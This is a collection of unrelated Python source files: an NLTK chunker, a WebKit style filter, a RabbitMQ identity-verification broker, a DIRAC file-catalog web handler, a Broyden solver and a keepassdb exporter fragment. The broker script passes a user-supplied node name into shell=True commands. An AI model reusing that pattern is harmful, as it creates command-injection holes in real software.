prevword,prevpos = "<START>","<START>"
else:
prevword,prevpos = sentence[i-1]
if i == len(sentence)-1:
nextword,nextpos = "<END>","<END>"
else:
nextword,nextpos = sentence[i+1]
return {
"pos":pos,
"prevpos":prevpos,
"word":word,
"nextpos":nextpos,
"prevpos+pos":"%s+%s" % (prevpos,pos),
"pos+nextpos":"%s+%s" % (pos,nextpos),
"tags-since-dt":tags_since_dt(sentence,i)}
def tags_since_dt(sentence,i):
tags = set()
for word,pos in sentence[:i]:
if pos == "DT":
tags = set()
else:
tags.add(pos)
return '+'.join(sorted(tags))
#%%
chunker = ConsecutiveNPChunker(train_sents)
print(chunker.evaluate(test_sents))
| DoWhatILove/turtle | programming/python/library/nltk/information_extraction.py | Python | mit | 4,285 | 0.018203 |
# Copyright (C) 2010 Chris Jerdonek ([email protected])
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains filter-related code."""
def validate_filter_rules(filter_rules, all_categories):
"""Validate the given filter rules, and raise a ValueError if not valid.
Args:
filter_rules: A list of boolean filter rules, for example--
["-whitespace", "+whitespace/braces"]
all_categories: A list of all available category names, for example--
["whitespace/tabs", "whitespace/braces"]
Raises:
ValueError: An error occurs if a filter rule does not begin
with "+" or "-" or if a filter rule does not match
the beginning of some category name in the list
of all available categories.
"""
for rule in filter_rules:
if not (rule.startswith('+') or rule.startswith('-')):
raise ValueError('Invalid filter rule "%s": every rule '
"must start with + or -." % rule)
for category in all_categories:
if category.startswith(rule[1:]):
break
else:
raise ValueError('Suspected incorrect filter rule "%s": '
"the rule does not match the beginning "
"of any category name." % rule)
class _CategoryFilter(object):
"""Filters whether to check style categories."""
def __init__(self, filter_rules=None):
"""Create a category filter.
Args:
filter_rules: A list of strings that are filter rules, which
are strings beginning with the plus or minus
symbol (+/-). The list should include any
default filter rules at the beginning.
Defaults to the empty list.
Raises:
ValueError: Invalid filter rule if a rule does not start with
plus ("+") or minus ("-").
"""
if filter_rules is None:
filter_rules = []
self._filter_rules = filter_rules
self._should_check_category = {} # Cached dictionary of category to True/False
def __str__(self):
return ",".join(self._filter_rules)
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this CategoryFilter instance is equal to another."""
return self._filter_rules == other._filter_rules
# Useful for unit testing.
def __ne__(self, other):
        # Python does not automatically deduce this from __eq__().
return not (self == other)
def should_check(self, category):
"""Return whether the category should be checked.
The rules for determining whether a category should be checked
are as follows. By default all categories should be checked.
Then apply the filter rules in order from first to last, with
later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
"""
if category in self._should_check_category:
return self._should_check_category[category]
should_check = True # All categories checked by default.
for rule in self._filter_rules:
if not category.startswith(rule[1:]):
continue
should_check = rule.startswith('+')
self._should_check_category[category] = should_check # Update cache.
return should_check
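    # For example (illustrative only):
    #   _CategoryFilter(["-whitespace", "+whitespace/braces"]).should_check(
    #       "whitespace/braces")  # True: the later, more specific rule wins
    #   _CategoryFilter(["-whitespace", "+whitespace/braces"]).should_check(
    #       "whitespace/tabs")    # False: only the "-whitespace" rule matches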
class FilterConfiguration(object):
"""Supports filtering with path-specific and user-specified rules."""
def __init__(self, base_rules=None, path_specific=None, user_rules=None):
"""Create a FilterConfiguration instance.
Args:
base_rules: The starting list of filter rules to use for
processing. The default is the empty list, which
by itself would mean that all categories should be
checked.
path_specific: A list of (sub_paths, path_rules) pairs
that stores the path-specific filter rules for
appending to the base rules.
The "sub_paths" value is a list of path
substrings. If a file path contains one of the
substrings, then the corresponding path rules
are appended. The first substring match takes
precedence, i.e. only the first match triggers
an append.
The "path_rules" value is the tuple of filter
rules that can be appended to the base rules.
The value is a tuple rather than a list so it
can be used as a dictionary key. The dictionary
is for caching purposes in the implementation of
this class.
user_rules: A list of filter rules that is always appended
to the base rules and any path rules. In other
words, the user rules take precedence over the
everything. In practice, the user rules are
provided by the user from the command line.
"""
if base_rules is None:
base_rules = []
if path_specific is None:
path_specific = []
if user_rules is None:
user_rules = []
self._base_rules = base_rules
self._path_specific = path_specific
self._path_specific_lower = None
"""The backing store for self._get_path_specific_lower()."""
# FIXME: Make user rules internal after the FilterConfiguration
# attribute is removed from ProcessorOptions (since at
# that point ArgumentPrinter will no longer need to
# access FilterConfiguration.user_rules).
self.user_rules = user_rules
self._path_rules_to_filter = {}
"""Cached dictionary of path rules to CategoryFilter instance."""
# The same CategoryFilter instance can be shared across
# multiple keys in this dictionary. This allows us to take
# greater advantage of the caching done by
# CategoryFilter.should_check().
self._path_to_filter = {}
"""Cached dictionary of file path to CategoryFilter instance."""
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this FilterConfiguration is equal to another."""
if self._base_rules != other._base_rules:
return False
if self._path_specific != other._path_specific:
return False
if self.user_rules != other.user_rules:
return False
return True
# Useful for unit testing.
def __ne__(self, other):
# Python does not automatically deduce this from __eq__().
return not self.__eq__(other)
# We use the prefix "_get" since the name "_path_specific_lower"
# is already taken up by the data attribute backing store.
def _get_path_specific_lower(self):
"""Return a copy of self._path_specific with the paths lower-cased."""
if self._path_specific_lower is None:
self._path_specific_lower = []
for (sub_paths, path_rules) in self._path_specific:
sub_paths = map(str.lower, sub_paths)
self._path_specific_lower.append((sub_paths, path_rules))
return self._path_specific_lower
def _path_rules_from_path(self, path):
"""Determine the path-specific rules to use, and return as a tuple."""
path = path.lower()
for (sub_paths, path_rules) in self._get_path_specific_lower():
for sub_path in sub_paths:
if path.find(sub_path) > -1:
return path_rules
return () # Default to the empty tuple.
def _filter_from_path_rules(self, path_rules):
"""Return the CategoryFilter associated to a path rules tuple."""
# We reuse the same CategoryFilter where possible to take
# advantage of the caching they do.
if path_rules not in self._path_rules_to_filter:
rules = list(self._base_rules) # Make a copy
rules.extend(path_rules)
rules.extend(self.user_rules)
self._path_rules_to_filter[path_rules] = _CategoryFilter(rules)
return self._path_rules_to_filter[path_rules]
def _filter_from_path(self, path):
"""Return the CategoryFilter associated to a path."""
if path not in self._path_to_filter:
path_rules = self._path_rules_from_path(path)
filter = self._filter_from_path_rules(path_rules)
self._path_to_filter[path] = filter
return self._path_to_filter[path]
def should_check(self, category, path):
"""Return whether the given category should be checked.
This method determines whether a category should be checked
by checking the category name against the filter rules for
the given path.
For a given path, the filter rules are the combination of
the base rules, the path-specific rules, and the user-provided
rules -- in that order. As we will describe below, later rules
in the list take precedence. The path-specific rules are the
rules corresponding to the first element of the "path_specific"
parameter that contains a string case-insensitively matching
some substring of the path. If there is no such element,
there are no path-specific rules for that path.
Given a list of filter rules, the logic for determining whether
a category should be checked is as follows. By default all
categories should be checked. Then apply the filter rules in
order from first to last, with later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
Args:
category: The category name.
path: The path of the file being checked.
"""
return self._filter_from_path(path).should_check(category)
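    # For example (illustrative only): with base_rules=["-whitespace"],
    # path_specific=[(["mac/"], ("+whitespace/braces",))] and user_rules=[],
    # should_check("whitespace/braces", "mac/foo.cpp") is True, while
    # should_check("whitespace/braces", "gtk/foo.cpp") is False.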
| cattleprod/samsung-kernel-gt-i9100 | external/webkit/WebKitTools/Scripts/webkitpy/style/filter.py | Python | gpl-2.0 | 11,910 | 0.00084 |
#!/usr/bin/env python
import sys
import os
import getopt
import time
import random
from messageQueue import MessageQueue
VERSION = 0.5
REQUEST_EXCHANGE = {"name":"Request", "ex_type":"headers"}
IDENTIFY_EXCHANGE = {"name":"Identify", "ex_type":"headers"}
RESULTS_EXCHANGE = {"name":"Results", "ex_type":"headers"}
TRANSFORM_EXCHANGE = {"name":"Transform", "ex_type":"headers"}
WEB_EXCHANGE = {"name":"Web", "ex_type":"headers"}
NIST_EXCHANGE = {"name":"NIST", "ex_type":"headers"}
SETTINGS_EXCHANGE = {'name':'settings','ex_type':'x-lvc'}
EXCHANGES = [REQUEST_EXCHANGE,IDENTIFY_EXCHANGE,RESULTS_EXCHANGE,TRANSFORM_EXCHANGE, WEB_EXCHANGE, NIST_EXCHANGE]
class MessageBrokerBase(MessageQueue):
# Base class
def __init__(self, node_name, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,routing_key='',settings=None):
super(MessageBrokerBase, self).__init__(node_name, user_id,settings=settings)
self.exchange = exchange_info
self.setup()
self.request_queue=self.queue_bind(self.exchange, header) #, routing_key)
self.log( 'starting '+self.__class__.__name__+' binding to '+exchange_info["name"])
def start(self, ):
self.start_consume(self.request_queue)
def local_exchage(self, ):
return {"name":self.node_name, "ex_type":"headers"}
def setup(self, ):
pass
#self.queue_name = self.channel.queue_declare( exclusive=False, queue = self.node_name).method.queue
# queue = "aa_"+self.node_name
class Broker(MessageBrokerBase):
# the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE
def __init__(self, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,settings=None):
super(Broker, self).__init__("Broker", user_id,header, exchange_info,settings=settings)
def setup(self, ):
#setup the exchanges
super(Broker, self).setup()
for exchange in EXCHANGES:
self.channel.exchange_declare(exchange=exchange["name"], type=exchange["ex_type"])
def on_return_status(self, properties):
# called as RPC to return the status of a sent msg
return "[OK] from %s"%self.node_name
def on_recieve_callback(self, ch, method, properties, body):
super(Broker,self).on_recieve_callback(ch, method, properties, body)
if 'filetype' in properties.headers:
import sys,re
import json
sys.path.append("..")
import modules.NISTutility as nu
#try:
filename = './output.eft'
filestr = re.search(r'base64,(.*)', json.loads(body)['file_content']).group(1)
output = open(filename, 'wb')
output.write(filestr.decode('base64'))
output.close()
NISTResult=nu.convertNIST(filename,'jpg','new_i'+filename)
self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False)
#except:
# self.send(WEB_EXCHANGE, "ERROR", properties.headers, False)
if 'setup' in properties.headers:
# Send the message back to the receiever
exchange = RESULTS_EXCHANGE
if properties.headers['requester']=='Web':
exchange = WEB_EXCHANGE
body = "Exchange params"
self.send(exchange, body, properties.headers,routing_key=properties.headers['requester'])
else:
# Send the message onto the Identify Exchange
self.send(IDENTIFY_EXCHANGE, body, properties.headers, False)
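    # Editor's note (an assumption inferred from the regex above): for
    # 'filetype' requests the body is JSON carrying a browser data-URL, e.g.
    #   {"file_content": "data:application/octet-stream;base64,<b64-bytes>"}
    # The base64 payload is written to disk and converted via NISTutility.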
class Transformer(MessageBrokerBase):
    # the transformer class - binds to the TRANSFORM_EXCHANGE and forwards messages on to the IDENTIFY_EXCHANGE
    def __init__(self, user_id="guest",header={},exchange_info = TRANSFORM_EXCHANGE,settings=None):
        super(Transformer, self).__init__("Transformer", user_id,header, exchange_info,settings=settings)
    def on_recieve_callback(self, ch, method, properties, body):
        super(Transformer,self).on_recieve_callback(ch, method, properties, body)
        self.send(IDENTIFY_EXCHANGE, body, properties.headers, False)
class NISTExtractor(MessageBrokerBase):
    # the NIST extractor class - binds to the NIST_EXCHANGE and sends converted results to the WEB_EXCHANGE
    def __init__(self, user_id="guest",header={},exchange_info = NIST_EXCHANGE,settings=None):
        super(NISTExtractor, self).__init__("NISTExtractor", user_id,header, exchange_info,settings=settings)
    def on_recieve_callback(self, ch, method, properties, body):
        import sys
        import json
        sys.path.append("..")
        import modules.NISTutility as nu
        super(NISTExtractor,self).on_recieve_callback(ch, method, properties, body)
        # NOTE: eftname (the path of the NIST/EFT file to convert) is not
        # defined in this scope; it must be supplied by the incoming message.
        NISTResult=nu.convertNIST(eftname,'jpg','new_i'+eftname)
        self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False)
class MsgLog(MessageQueue):
# the logging class - binds to the fire_host
def __init__(self, user_id="guest",header={},settings=None):
super(MsgLog, self).__init__("Logger", user_id,settings=settings)
self.channel.queue_declare(queue='firehose-queue', durable=False,auto_delete=True, exclusive=True)
self.request_queue=self.queue_bind({"name":"Results"},queue_name= 'firehose-queue', routing_key='#')
self.request_queue=self.queue_bind({"name":"Web"},queue_name= 'firehose-queue', routing_key='#')
#self.request_queue=self.queue_bind({"name":"Request"},queue_name= 'firehose-queue', routing_key='#')
self.request_queue=self.queue_bind({"name":"Identify"},queue_name= 'firehose-queue', routing_key='#')
def on_recieve_callback(self, ch, method, properties, body):
#self.log(body)
if 'requester' in properties.headers:
self.log("from %s for %s to %s"%( properties.headers['requester'], properties.headers['destination']['name'], properties.headers['last_node']))
self.log(str(properties.user_id))
        #else:
        #    self.log(str(properties))
        #    self.log(str(method))
        #    self.log(str(body))
def start(self, ):
self.start_consume(self.request_queue)
class Matcher(MessageBrokerBase):
# the matcher class - binds to the IDENTIFY_EXCHANGE
# undertakes match and puts return on the RESULTS_EXCHANGE queue with the routing_key of the name
def __init__(self, node_name, user_id="guest",header={},exchange_info = IDENTIFY_EXCHANGE,settings=None):
header.update({"from_node":node_name})
super(Matcher, self).__init__(node_name, user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
super(Matcher,self).on_recieve_callback(ch, method, properties, body)
self.log('Matching '+str(properties.headers))
if 'requester' in properties.headers and not(self.node_name == properties.headers['requester']): # make sure not to match our own request
body = "Match score = %f from %s"%(random.random(),self.node_name)
self.log("doing match - sending "+body)
exchange = RESULTS_EXCHANGE
if properties.headers['requester']=='Web':
exchange = WEB_EXCHANGE
self.log("my exchange is "+str(exchange))
self.send(exchange, body, properties.headers,routing_key=properties.headers['requester'])
class Requester(MessageQueue):
# the match request class - sends a request on the REQUEST_EXCHANGE
def __init__(self, node_name, user_id="guest",settings=None):
super(Requester, self).__init__(node_name, user_id,settings=settings)
def send(self, msg,header):
header.update({self.node_name:True,'requester':self.node_name})
super(Requester,self).send(REQUEST_EXCHANGE,msg,header,True)
class Receiver(MessageBrokerBase):
# retrieve the results from the RESULTS_EXCHANGE
def __init__(self, node_name, user_id="guest",header={},exchange_info = RESULTS_EXCHANGE,settings=None):
super(Receiver, self).__init__(node_name, user_id,header, exchange_info, settings=settings,routing_key=node_name) #routing_key=node_name,
def on_recieve_callback(self, ch, method, properties, body):
super(Receiver,self).on_recieve_callback(ch, method, properties, body)
self.log("recieved "+body)
if __name__ == "__main__":
import argparse
from subprocess import check_call
# Parse command line args
# note that args can be read from a file using the @ command
parser = argparse.ArgumentParser(description='Identity Verification Service',fromfile_prefix_chars='@')
parser.add_argument('--rabbitmq_host', default='localhost',
help='set the rabbitmq url (default localhost)')
parser.add_argument('--redis_host', default='localhost',
help='set the redis url (default localhost)')
parser.add_argument('--redis_port', default=6379,
help='set the redis port (default 6379)')
parser.add_argument('--is_broker','-b', action='store_true',
help='Is the broker')
parser.add_argument('--is_matcher','-m', action='store_true',
help='Is a matcher')
parser.add_argument('--is_requester','-r', action='store_true',
help='Is a requester')
parser.add_argument('--is_receiver','-e', action='store_true',
                        help='Is a receiver')
parser.add_argument('--is_logger','-l', action='store_true',
help='Is a logger')
parser.add_argument('--name','-n', default='[No Name]',
help='Name of the agency/node')
parser.add_argument('--version', action='version', version='%(prog)s '+str(VERSION))
args = parser.parse_args()
header={"test":"test"}
if args.is_matcher:
check_call('python rabbitmqadmin.py declare user name="%s" password="guest" tags="Australia_NZ,Bali"'%args.name,shell=True)
s = 'python rabbitmqadmin.py declare permission vhost="/" user="%s" configure=".*" write=".*" read=".*"'%args.name
check_call(s,shell=True)
matcher = Matcher(args.name,args.name,header,settings=args)
matcher.start()
elif args.is_broker:
broker = Broker("broker",header,settings=args)
#queue=broker.queue_bind(dest_queue, header)
broker.start() #_consume(queue)
elif args.is_requester:
requester = Requester(args.name,args.name,settings=args)
requester.send("Hello",header)
elif args.is_receiver:
receiver = Receiver(args.name,args.name,{args.name:True},settings=args)
receiver.start()
elif args.is_logger:
logger = MsgLog("broker",header,settings=args)
logger.start()
#sendRequest(my_queue, dest_queue, priority, m_type, d_file)
| ted-dunstone/ivs | hub_demo/send_msg.py | Python | mit | 11,161 | 0.021862 |
from chula.www.controller.base import Controller
| jmcfarlane/chula | chula/www/controller/__init__.py | Python | gpl-2.0 | 49 | 0 |
from WebAppDIRAC.Lib.WebHandler import WebHandler, asyncGen
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup
from DIRAC import gConfig, gLogger
from DIRAC.Core.Utilities import Time
from hashlib import md5
class FileCatalogHandler( WebHandler ):
AUTH_PROPS = "authenticated"
def __init__(self, *args, **kwargs ):
super( FileCatalogHandler, self ).__init__( *args, **kwargs )
sessionData = self.getSessionData()
self.user = sessionData['user'].get( 'username', '' )
self.group = sessionData['user'].get( 'group', '' )
self.vo = getVOForGroup( self.group )
self.fc = FileCatalog( vo = self.vo )
'''
Method to read all the available fields possible for defining a query
'''
@asyncGen
def web_getMetadataFields(self):
self.L_NUMBER = 0
self.S_NUMBER = 0
result = yield self.threadTask( self.fc.getMetadataFields )
gLogger.debug( "request: %s" % result )
if not result[ "OK" ] :
gLogger.error( "getSelectorGrid: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result["Value"]
callback = {}
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key"
gLogger.error( "getSelectorGrid: %s" % error )
self.finish({ "success" : "false" , "error" : error })
return
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key"
gLogger.error( "getSelectorGrid: %s" % error )
self.finish({ "success" : "false" , "error" : error })
return
filemeta = result[ "FileMetaFields" ]
if len( filemeta ) > 0 :
for key , value in filemeta.items():
callback[key]= "label"
gLogger.debug( "getSelectorGrid: FileMetaFields callback %s" % callback )
dirmeta = result[ "DirectoryMetaFields" ]
if len( dirmeta ) > 0 :
for key , value in dirmeta.items():
callback[key]= value.lower()
gLogger.debug( "getSelectorGrid: Resulting callback %s" % callback )
self.finish({ "success" : "true" , "result" : callback})
'''
Method to read all the available options for a metadata field
'''
@asyncGen
def web_getQueryData( self ):
try:
compat = dict()
for key in self.request.arguments:
parts = str( key ).split(".")
if len(parts)!=3:
continue
key = str( key )
name = parts[1]
sign = parts[2]
if not len( name ) > 0:
continue
value = str( self.request.arguments[ key ][0] ).split("|")
#check existence of the 'name' section
if not compat.has_key(name):
compat[name] = dict()
#check existence of the 'sign' section
if not compat[name].has_key(sign):
if value[0]=="v":
compat[name][sign] = ""
elif value[0]=="s":
compat[name][sign] = []
if value[0]=="v":
compat[name][sign] = value[1]
elif value[0]=="s":
compat[name][sign] += value[1].split(":::")
except Exception, e:
self.finish({ "success" : "false" , "error" : "Metadata query error" })
return
path = "/"
if self.request.arguments.has_key("path") :
path = self.request.arguments["path"][0]
gLogger.always( compat )
result = yield self.threadTask( self.fc.getCompatibleMetadata, compat, path )
gLogger.always( result )
if not result[ "OK" ]:
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
self.finish({ "success" : "true" , "result" : result["Value"] })
@asyncGen
def web_getFilesData( self ) :
req = self.__request()
gLogger.always(req)
gLogger.debug( "submit: incoming request %s" % req )
result = yield self.threadTask( self.fc.findFilesByMetadataWeb, req["selection"] , req["path"] , self.S_NUMBER , self.L_NUMBER)
gLogger.debug( "submit: result of findFilesByMetadataDetailed %s" % result )
if not result[ "OK" ] :
gLogger.error( "submit: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result[ "Value" ]
if not len(result) > 0:
self.finish({ "success" : "true" , "result" : [] , "total" : 0, "date":"-" })
return
total = result[ "TotalRecords" ]
result = result[ "Records" ]
callback = list()
for key , value in result.items() :
size = ""
if "Size" in value:
size = value[ "Size" ]
date = ""
if "CreationDate" in value:
date = str( value[ "CreationDate" ] )
meta = ""
if "Metadata" in value:
m = value[ "Metadata" ]
meta = '; '.join( [ '%s: %s' % ( i , j ) for ( i , j ) in m.items() ] )
dirnameList = key.split("/")
dirname = "/".join(dirnameList[:len(dirnameList)-1])
filename = dirnameList[len(dirnameList)-1:]
callback.append({"fullfilename":key, "dirname": dirname, "filename" : filename , "date" : date , "size" : size ,
"metadata" : meta })
timestamp = Time.dateTime().strftime("%Y-%m-%d %H:%M [UTC]")
self.finish({ "success" : "true" , "result" : callback , "total" : total, "date":timestamp})
def __request(self):
req = { "selection" : {} , "path" : "/" }
self.L_NUMBER = 25
if self.request.arguments.has_key( "limit" ) and len( self.request.arguments[ "limit" ][0] ) > 0:
self.L_NUMBER = int( self.request.arguments[ "limit" ][0] )
self.S_NUMBER = 0
if self.request.arguments.has_key( "start" ) and len( self.request.arguments[ "start" ][0] ) > 0:
self.S_NUMBER = int( self.request.arguments[ "start" ][0] )
result = gConfig.getOption( "/WebApp/ListSeparator" )
if result[ "OK" ] :
separator = result[ "Value" ]
else:
separator = ":::"
result = self.fc.getMetadataFields()
gLogger.debug( "request: %s" % result )
if not result["OK"]:
gLogger.error( "request: %s" % result[ "Message" ] )
return req
result = result["Value"]
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
filemeta = result[ "FileMetaFields" ]
dirmeta = result[ "DirectoryMetaFields" ]
meta = []
for key,value in dirmeta.items() :
meta.append( key )
gLogger.always( "request: metafields: %s " % meta )
for param in self.request.arguments :
tmp = str( param ).split( '.' )
if len( tmp ) != 3 :
continue
name = tmp[1]
logic = tmp[2]
value = self.request.arguments[param][0].split("|")
if not logic in ["in","nin", "=" , "!=" , ">=" , "<=" , ">" , "<" ] :
gLogger.always( "Operand '%s' is not supported " % logic )
continue
if name in meta :
#check existence of the 'name' section
if not req[ "selection" ].has_key(name):
req[ "selection" ][name] = dict()
#check existence of the 'sign' section
if not req[ "selection" ][name].has_key(logic):
if value[0]=="v":
req[ "selection" ][name][logic] = ""
elif value[0]=="s":
req[ "selection" ][name][logic] = []
if value[0]=="v":
req[ "selection" ][name][logic] = value[1]
elif value[0]=="s":
req[ "selection" ][name][logic] += value[1].split(":::")
if self.request.arguments.has_key("path") :
req["path"] = self.request.arguments["path"][0]
gLogger.always("REQ: ",req)
return req
def __request_file(self):
req = { "selection" : {} , "path" : "/" }
separator = ":::"
result = self.fc.getMetadataFields()
gLogger.debug( "request: %s" % result )
if not result["OK"]:
gLogger.error( "request: %s" % result[ "Message" ] )
return req
result = result["Value"]
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
filemeta = result[ "FileMetaFields" ]
dirmeta = result[ "DirectoryMetaFields" ]
meta = []
for key,value in dirmeta.items() :
meta.append( key )
gLogger.always( "request: metafields: %s " % meta )
selectionElems=self.request.arguments["selection"][0].split("<|>")
gLogger.always( "request: THISSSS %s " % self.request.arguments["selection"][0] )
for param in selectionElems:
tmp = str( param ).split( '|' )
if len( tmp ) != 4 :
continue
name = tmp[0]
logic = tmp[1]
if not logic in ["in","nin", "=" , "!=" , ">=" , "<=" , ">" , "<" ] :
gLogger.always( "Operand '%s' is not supported " % logic )
continue
if name in meta :
#check existence of the 'name' section
if not req[ "selection" ].has_key(name):
req[ "selection" ][name] = dict()
#check existence of the 'sign' section
if not req[ "selection" ][name].has_key(logic):
if tmp[2]=="v":
req[ "selection" ][name][logic] = ""
elif tmp[2]=="s":
req[ "selection" ][name][logic] = []
if tmp[2]=="v":
req[ "selection" ][name][logic] = tmp[3]
elif tmp[2]=="s":
req[ "selection" ][name][logic] += tmp[3].split(":::")
if self.request.arguments.has_key("path") :
req["path"] = self.request.arguments["path"][0]
gLogger.always("REQ: ",req)
return req
@asyncGen
def web_getMetadataFilesInFile( self ):
self.set_header('Content-type','text/plain')
self.set_header('Content-Disposition', 'attachment; filename="error.txt"')
req = self.__request_file()
gLogger.always(req)
gLogger.debug( "submit: incoming request %s" % req )
result = yield self.threadTask( self.fc.findFilesByMetadata, req["selection"] , req["path"])
if not result[ "OK" ] :
gLogger.error( "submit: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result[ "Value" ]
retStrLines = []
if len(result)>0:
for fileName in result:
retStrLines.append(fileName)
strData = "\n".join(retStrLines)
self.set_header('Content-type','text/plain')
self.set_header('Content-Disposition', 'attachment; filename="%s.txt"' % md5( str( req ) ).hexdigest())
self.set_header('Content-Length', len( strData ))
self.finish(strData)
@asyncGen
def web_getSubnodeFiles( self ):
path = self.request.arguments["path"][0]
# print path
# path = "/vo.cta.in2p3.fr"
result = yield self.threadTask( self.fc.listDirectory, path, False)
if not result[ "OK" ] :
gLogger.error( "submit: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
# print result
filesData = result["Value"]["Successful"][path]["Files"]
dirData = result["Value"]["Successful"][path]["SubDirs"]
retData = []
for entryName in dirData:
nodeDef = { 'text' : entryName.split("/")[-1] }
nodeDef[ 'leaf' ] = False
nodeDef[ 'expanded' ] = False
retData.append(nodeDef)
for entryName in filesData:
nodeDef = { 'text' : entryName.split("/")[-1] }
nodeDef[ 'leaf' ] = True
retData.append(nodeDef)
retData = sorted(retData, key=lambda node: node['text'].upper())
self.finish({"success" : "true", "nodes":retData})
| zmathe/WebAppDIRAC | WebApp/handler/FileCatalogHandler.py | Python | gpl-3.0 | 12,082 | 0.048088 |
#!/usr/bin/env python3
from erros import NaoConverge
from numpy import matrix
from numpy.linalg import inv
from numpy.linalg import norm
def SolucaoEqNLinearBroyden(xin, bi, tol, niter, F):
xold = xin
bold = matrix(bi)
tolerancia = 1
while (tolerancia > tol and niter != -1):
f = matrix(F(xold))
if f.size == 1:
f = f.transpose()
j = bold
jinv = inv(j)
deltax = -1 * jinv * f
        deltax = deltax.transpose() # transposed so it can be added to xold
xnew = deltax + xold
        deltax = deltax.transpose() # back to the original orientation
xnew = list(xnew.flat)
y = matrix(F(xnew)) - matrix(F(xold))
bnew = bold + ((y - bold*deltax)*deltax.transpose()) / (deltax.transpose()*deltax)
tolerancia = norm(deltax) / norm(xnew)
niter -= 1
xold = xnew
bold = bnew
if niter == -1:
raise NaoConverge
return xold
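# The update above is Broyden's rank-one ("good Broyden") formula, written in
# the same notation as the code:
#   B_{k+1} = B_k + ((y_k - B_k*dx_k) * dx_k^T) / (dx_k^T * dx_k)
# with dx_k = x_{k+1} - x_k and y_k = F(x_{k+1}) - F(x_k). It enforces the
# secant condition B_{k+1}*dx_k = y_k without recomputing the Jacobian; note
# the code still inverts B on every step, which an implementation could avoid
# via the Sherman-Morrison formula.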
if __name__ == "__main__":
F = lambda x: [[x[0] + 2 * x[1] - 2], [x[0]*x[0] + 4 * x[1]*x[1] - 4]]
try:
print(SolucaoEqNLinearBroyden([2,3], [[1,2],[4,24]], 0.0001, 100, F))
except NaoConverge:
print("Convergence not reached")
| paulocsanz/algebra-linear | scripts/eq_n_linear_broyden.py | Python | agpl-3.0 | 1,262 | 0.011094 |
"""
Support for exporting database to KeePassX XML format.
"""
from __future__ import absolute_import
from datetime import datetime
from xml.etree import ElementTree as ET
from xml.dom import minidom
from keepassdb import const
class XmlExporter(object):
"""
Class for exporting database to KeePassX XML format.
:ivar include_comment: Whether to include a 'generated-by' comment in the header.
:ivar prettyprint: Whether to generate pretty-printed XML (indent, etc.).
"""
include_comment = False
prettyprint = True
def __init__(self, include_comment=False, prettyprint=True):
self.include_comment = include_comment
self.prettyprint = prettyprint
def export(self, db):
"""
Export the dbnode to KeePassX XML format.
:param db: The database to export.
:type db: :class:`keepassdb.db.Database`
"""
dbnode = ET.Element('database')
if self.include_comment:
now = datetime.now()
filepath = db.filepath
if filepath:
comment = ET.Comment('Generated by keepassdb from {0} on {1}'.format(filepath, now.strftime("%c")))
else:
comment = ET.Comment('Generated by keepassdb on {0}'.format(now.strftime("%c")))
dbnode.append(comment)
def _date(dt):
if dt == const.NEVER:
return 'Never'
else:
# 2012-12-20T20:56:56
return dt.strftime('%Y-%m-%dT%H:%M:%S')
def group_to_xml(group, node):
gnode = ET.SubElement(node, 'group')
title = ET.SubElement(gnode, 'title')
title.text = group.title
icon = ET.SubElement(gnode, 'icon')
icon.text = str(group.icon)
for subgroup in group.children:
group_to_xml(subgroup, gnode)
for entry in group.entries:
if entry.title == 'Meta-Info' and entry.username == 'SYSTEM':
